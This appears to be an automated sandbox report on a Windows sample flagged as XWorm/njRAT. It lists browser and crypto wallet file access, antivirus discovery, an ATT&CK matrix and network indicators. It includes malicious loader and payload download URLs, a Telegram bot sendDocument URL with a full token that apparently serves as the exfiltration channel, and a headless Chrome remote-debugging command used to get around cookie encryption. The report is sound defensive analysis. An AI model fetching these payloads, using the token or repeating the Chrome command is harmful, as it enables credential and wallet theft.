Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\ar VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\de VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\en-GB VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\es VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\fr VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\fr-CA VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\ja VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\nl VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\pt-PT VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\sv VolumeInformation

Source: C:\Users\user\Desktop\spreadmalware.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.powershell.exe.2b268dd0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.powershell.exe.2b2016349c0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.1811615016.000002B2014FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7376, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: powershell.exe	String found in binary or memory: disabletaskkillGoString01234567beEfFgGvsignal: FullPath*.walletbytecoinBytecoinDashCoreElectrumEthereumkeystoreLitecoinMyMoneroChromiumArgent XCoinbaseMetamaskTronLinksettings.featherNovolinealts.txtPaladiumsave.datTelegramProgramschromiumhijackedNO_ERRORPRIOR
Source: powershell.exe	String found in binary or memory: teravx512vpopcntdq0123456789abcdefafter object keyRead after Closeexpected integerTerminateProcessSetWriteDeadlineexec: no commandRel: can't make com.liberty.jaxxTelegram Desktop--user-data-dir=SETTINGS_TIMEOUTFRAME_SIZE_ERRORContent-Encodingcontent-encodingco
Source: powershell.exe, 00000029.00000002.1870747846.000000C00005A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: powershell.exe, 00000029.00000002.1870747846.000000C00005A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: powershell.exe	String found in binary or memory: [:^word:]d.nx != 0CopyFileWHeapAlloc_gmtime64ClassINETAuthorityquestionsunderflowchrome.exekometa.exemsedge.exeyandex.exe%s\\%s.zip for type (BADINDEX)%!(NOVERB)0123456789/dev/stdinCreateFileexecerrdotSYSTEMROOTMonero GUICrypto.comExodusWeb3MathWallet.minecraf
Source: powershell.exe	String found in binary or memory: disabletaskkillGoString01234567beEfFgGvsignal: FullPath*.walletbytecoinBytecoinDashCoreElectrumEthereumkeystoreLitecoinMyMoneroChromiumArgent XCoinbaseMetamaskTronLinksettings.featherNovolinealts.txtPaladiumsave.datTelegramProgramschromiumhijackedNO_ERRORPRIOR
Source: spreadmalware.exe, 00000001.00000000.1241649385.0000000000682000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache

Tries to steal Crypto Currency Wallets

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Atomic\Local Storage\leveldb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Directory queried: number of queries: 1105

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 1156, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data"

Yara detected XWorm

Source: Yara match	File source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.powershell.exe.2b268dd0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.powershell.exe.2b2016349c0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.1811615016.000002B2014FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7376, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	341 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	211 Disable or Modify Tools	1 OS Credential Dumping	12 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	45 System Information Discovery	Remote Desktop Protocol	3 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Obfuscated Files or Information	Security Account Manager	341 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	2 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	271 Virtualization/Sandbox Evasion	SSH	Keylogging	1 Remote Access Software	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	3 Non-Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	4 Application Layer Protocol	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	271 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	1 Proxy	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
spreadmalware.exe	46%	Virustotal		Browse
spreadmalware.exe	50%	ReversingLabs	ByteCode-MSIL.Backdoor.njRAT
spreadmalware.exe	100%	Avira	HEUR/AGEN.1327136
spreadmalware.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://pastejustit.com/raw/msdcgy3bxg	100%	Avira URL Cloud	phishing
https://anonsharing.com(	0%	Avira URL Cloud	safe
http://anonsharing.com	100%	Avira URL Cloud	malware
https://sigma.dreamhosters.com/User-Agent:	0%	Avira URL Cloud	safe
https://anonsharing.com	100%	Avira URL Cloud	malware
https://anonsharing.com/db59849be6b5f562/skibiditoilet.bat?download_token=a1e8551a275440a5e4f080f8e9763eec660cff556b920932c8cd94522d789e26	100%	Avira URL Cloud	malware
https://anonsharing.com/file/13a37f52caaf958b/serverrefsvc.exe	100%	Avira URL Cloud	malware
https://sigma.dreamhosters.com/	0%	Avira URL Cloud	safe
https://raw.gith	0%	Avira URL Cloud	safe
https://anonsharing.com/13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0	100%	Avira URL Cloud	malware
http://localhost:9222taskkill.jsC:	0%	Avira URL Cloud	safe
https://sigma.drform-data;	0%	Avira URL Cloud	safe
https://sigma.dreamhosters.com/C:	0%	Avira URL Cloud	safe
https://anonsharing.com/13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0c0de41850bb5ec93884b730d3cb871a169aeb	100%	Avira URL Cloud	malware
https://objects.githubuserconth	0%	Avira URL Cloud	safe
https://anonsharing.com/file/db59849be6b5f562/skibiditoilet.bat	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pastejustit.com	178.159.12.230	true	true	unknown
anonsharing.com	104.21.32.1	true	false	unknown
github.com	140.82.121.3	true	false	high
raw.githubusercontent.com	185.199.110.133	true	false	high
sigma.dreamhosters.com	107.180.236.211	true	false	unknown
api.telegram.org	149.154.167.220	true	false	high
objects.githubusercontent.com	185.199.111.133	true	false	high
ca-central-1.wasabisys.com	38.143.146.102	true	false	high
s3.ca-central-1.wasabisys.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pastejustit.com/raw/msdcgy3bxg	true	Avira URL Cloud: phishing	unknown
https://raw.githubusercontent.com/43a1723/test/main/download.ps1	false		high
https://github.com/43a1723/test/releases/download/siu/lmaoxclient	false		high
https://sigma.dreamhosters.com/	false	Avira URL Cloud: safe	unknown
https://anonsharing.com/db59849be6b5f562/skibiditoilet.bat?download_token=a1e8551a275440a5e4f080f8e9763eec660cff556b920932c8cd94522d789e26	false	Avira URL Cloud: malware	unknown
https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Mewing	false		high
https://anonsharing.com/file/13a37f52caaf958b/serverrefsvc.exe	false	Avira URL Cloud: malware	unknown
https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/SryxenBuilt.bin	false		high
https://raw.githubusercontent.com/43a1723/test/main/Ip	false		high
https://anonsharing.com/13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0c0de41850bb5ec93884b730d3cb871a169aeb	false	Avira URL Cloud: malware	unknown
https://api.telegram.org/bot7487418347:AAHo0dKeo0c-nZAiN9ZgiVPbyp4xTSdsV2E/sendDocument	false		high
https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1	false		high
https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1	false		high
https://anonsharing.com/file/db59849be6b5f562/skibiditoilet.bat	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com	powershell.exe, 00000029.00000002.1905889415.0000016D1B3D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1A3F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200ACD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/X	powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp	false		high
https://s3.ca-central-1.wasabisys.com	spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anonsharing.com	spreadmalware.exe, 00000001.00000002.1292529153.00000000029E2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ca-central-1.wasabisys.com	spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anonsharing.com(	spreadmalware.exe, 00000001.00000002.1292529153.0000000002A07000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://github.com	powershell.exe, 00000029.00000002.1905889415.0000016D1B7AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200BC3000.00000004.00000800.00020000.00000000.sdmp	false		high
